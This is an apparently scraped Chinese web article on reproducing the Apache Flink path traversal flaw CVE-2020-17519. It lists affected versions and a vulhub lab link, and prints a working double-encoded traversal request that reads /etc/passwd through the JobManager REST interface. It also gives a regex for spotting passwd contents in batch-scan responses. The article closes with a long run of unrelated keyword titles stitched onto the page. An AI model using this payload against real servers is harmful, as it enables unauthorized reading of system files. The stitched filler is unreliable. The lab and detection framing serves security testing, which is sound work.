如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现
发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,今天就跟大家聊聊有关如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
千家信息网最后更新 2025年02月01日如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现
今天就跟大家聊聊有关如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
Apache Flink 是高效和分布式的通用数据处理平台。
Apache Flink 声明式的数据分析开源系统,结合了分布式 MapReduce 类平台的高效,灵活的编程和扩展性,具有强大的流处理和批处理功能。同时在并行数据库发现查询优化方案。
要求Unix 类环境(Linux, Mac OS X, Cygwin)gitMaven (at least version 3.0.4)Java 6, 7 or 8 (Note that Oracle's JDK 6 library will fail to build Flink, but is able to run a pre-compiled package without problem)git clone https://github.com/apache/incubator-flink.gitcd incubator-flinkmvn clean package -DskipTests # this will take up to 5 minutes
Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。
从官方文档来看 只能在UINX系统运行
影响版本:
1.11.0
1.11.1
1.11.2
Docker地址:
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
POC:
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Python批量检测脚本:
提供下正则:
pattern=re.compile( r"((root|bin|daemon|sys|sync|games|man|mail|news|www-data|uucp|backup|list|proxy|gnats|nobody" r"|syslog|mysql" r"|bind|ftp|sshd|postfix):[\d\w\-\s,]+:\d+:\d+:[\w\-_\s,]*:[\w\-_\s,\/]*:[\w\-_," r"\/]*[\r\n])") re_html=pattern.findall(html)
本地新建host.txt
放入要检测的url回车分割
逐行读取
看完上述内容,你们对如何进行Apache Flink路径遍历漏洞CVE-2020-17519复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注行业资讯频道,感谢大家的支持。
内容
数据
系统
漏洞
路径
分布式
平台
文件
版本
处理
检测
强大
为此
作者
使用者
功能
同时
后果
地址
官方
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
怎么做好网络安全防范论文
服务器上的注册表如何去打开
亚马逊使用云服务器安全吗
学生姓名表达式怎么写数据库
服务器独享带宽和家用宽带的区别
cookie传入服务器失效
修改的数据库的数据为什么会重置
网络技术构建
服务器怎么查看设备序列号
数据库数据如何去重
上海高校党建软件开发哪儿好
开源p2p服务器
打开数据库软件
中指数据库密码时限
如何申请软件开发企业
专业网络安全比赛
手机查车app域名或者服务器
长江汽车电子公司软件开发岗
计算机和网络技术教育的特点
为什么服务器6区进不去
互联网和网络安全
idle数据库需要下载吗
南昌二附院网络安全协调会
宝山区管理软件开发排名靠前
不限内容服务器
vf数据库定位文件
联通网络技术员简历
网络安全鑫昆
物流网络技术的发展趋势
网络安全专业本科